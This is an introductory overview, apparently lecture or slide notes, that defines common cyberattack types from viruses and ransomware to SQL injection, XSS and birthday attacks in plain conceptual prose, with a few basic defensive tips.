Cyber Attacks
Malware
Malware is any code that can be used to steal data, bypass access controls or cause
harm to or compromise a system.
Viruses
A virus is a type of computer program that, when executed, replicates and
attaches itself to other files, such as legitimate programs, by inserting its
own code into the file. Some viruses are harmless yet others can be
destructive, such as those that modify or delete data. Most viruses require
end-user interaction to initiate activation, and can be written to act on a
specific date or time.
Viruses can be spread through removable media such as USB flash drives,
internet downloads, and email attachments. The simple act of opening a file
or executing an infected program can trigger a virus. Once a virus is active,
it will usually infect other programs on the computer or other computers on
the network. Viruses mutate to avoid detection.
Worms
A worm is a malicious software program that replicates by independently
exploiting vulnerabilities in networks. Unlike a virus, which requires a host
program to run, worms can run by themselves. Other than the initial
infection of the host, they do not require user participation and can spread
very quickly over the network, usually slowing it down.
Worms share similar patterns: they exploit system vulnerabilities, they have
a way to propagate themselves, and they all contain malicious code
(payload) that causes damage to computer systems or networks.
Trojan horse
A Trojan horse is malware that carries out malicious operations by masking
its true intent. It might appear legitimate but is, in fact, very dangerous.
Trojans exploit the privileges of the user who runs them.
Unlike viruses, Trojans do not self-replicate but often bind themselves to
non-executable files, such as image, audio, or video files, that act as a decoy
to harm the systems of unsuspecting users.
�Logic Bombs
A logic bomb is a malicious program that waits for a trigger, such as a specified
date or database entry, to set off malicious code. Until this trigger event happens,
the logic bomb will remain inactive.
Once activated, a logic bomb implements malicious code that causes harm to a
computer in various ways. It can sabotage database records, erase files, and attack
operating systems or applications.
Ransomware
This malware is designed to hold a computer system or the data it contains captive
until a payment is made.
Ransomware usually works by encrypting your data so that you cannot access it.
According to ransomware claims, once the ransom is paid via an untraceable
payment system, the cybercriminal will supply a program that decrypts the files or
sends an unlock code. In reality, many victims do not gain access to their data even
after they have paid.
Some versions of ransomware take advantage of specific system vulnerabilities.
Ransomware is often spread through phishing emails that encourage you to
download a malicious attachment, or through a software vulnerability.
DNS spoofing
DNS spoofing or DNS cache poisoning is an attack in which false data is
introduced into a DNS resolver cache — the temporary database on a computer’s
operating system that records recent visits to websites and other internet domains.
These attacks exploit a weakness in the DNS caching software that causes DNS
servers to redirect traffic for a legitimate domain to the IP address of an illicit
server.
Man-in-the Middle (MitM)
A MitM attack also known as an on-path attack happens when a cybercriminal
takes control of an intermediate device without the user’s knowledge. With this
level of access an attacker can intercept, manipulate and relay false information
between the sender and the intended destination
�Zero-Day Attacks
A zero-day attack, or zero-day, threat exploits software vulnerabilities before they
become known or before they are disclosed by the software vendor.
Brute force attacks
A brute-force attack gets its name from the “brutish” or simple methodology
employed by the attack. The attacker simply tries to guess the login credentials of
someone with access to the target system. Once they get it right, they are in.
While this may sound time-consuming and difficult, attackers often use bots to
crack the credentials. The attacker provides the bot with a list of credentials that
they think may give them access to the secure area. The bot then tries each one
while the attacker sits back and waits. Once the correct credentials have been
entered, the criminal gains access.
To prevent brute-force attacks, have lock-out policies in place as part of your
authorization security architecture. After a certain number of attempts, the user
attempting to enter the credentials gets locked out. This typically involves
“freezing” the account so even if someone else tries from a different device with a
different IP address, they cannot bypass the lockout.
It is also wise to use random passwords without regular words, dates, or sequences
of numbers in them. This is effective because, for example, even if an attacker uses
software to try to guess a 10-digit password, it will take many years of non-stop
attempts to get it right.
DoS and DDoS attacks
A denial-of-service (DoS) attack is designed to overwhelm the resources of a
system to the point where it is unable to reply to legitimate service requests. A
distributed denial-of-service (DDoS) attack is similar in that it also seeks to drain
the resources of a system. A DDoS attack is initiated by a vast array of malware-
infected host machines controlled by the attacker. These are referred to as “denial
of service” attacks because the victim site is unable to provide service to those who
want to access it.
With a DoS attack, the target site gets flooded with illegitimate requests. Because
the site has to respond to each request, its resources get consumed by all the
responses. This makes it impossible for the site to serve users as it normally does
and often results in a complete shutdown of the site.
�Phishing attacks
A phishing attack occurs when a malicious actor sends emails that seem to be
coming from trusted, legitimate sources in an attempt to grab sensitive information
from the target. Phishing attacks combine social engineering and technology and
are so-called because the attacker is, in effect, “fishing” for access to a forbidden
area by using the “bait” of a seemingly trustworthy sender.
SQL injection attacks
Structured Query Language (SQL) injection is a common method of taking
advantage of websites that depend on databases to serve their users. Clients are
computers that get information from servers, and an SQL attack uses an SQL query
sent from the client to a database on the server. The command is inserted, or
“injected”, into a data plane in place of something else that normally goes there,
such as a password or login. The server that holds the database then runs the
command and the system is penetrated.
Insider threats
Sometimes, the most dangerous actors come from within an organization. People
within a company’s own doors pose a special danger because they typically have
access to a variety of systems, and in some cases, admin privileges that enable
them to make critical changes to the system or its security policies.
XSS attacks
With XSS, or cross-site scripting, the attacker transmits malicious scripts using
clickable content that gets sent to the target’s browser. When the victim clicks on
the content, the script is executed. Because the user has already logged into a web
application’s session, what they enter is seen as legitimate by the web application.
However, the script executed has been altered by the attacker, resulting in an
unintended action being taken by the “user.”
Birthday attack
In a birthday attack, an attacker abuses a security feature: hash algorithms, which
are used to verify the authenticity of messages. The hash algorithm is a digital
signature, and the receiver of the message checks it before accepting the message
as authentic. If a hacker can create a hash that is identical to what the sender has
appended to their message, the hacker can simply replace the sender’s message
with their own. The receiving device will accept it because it has the right hash.
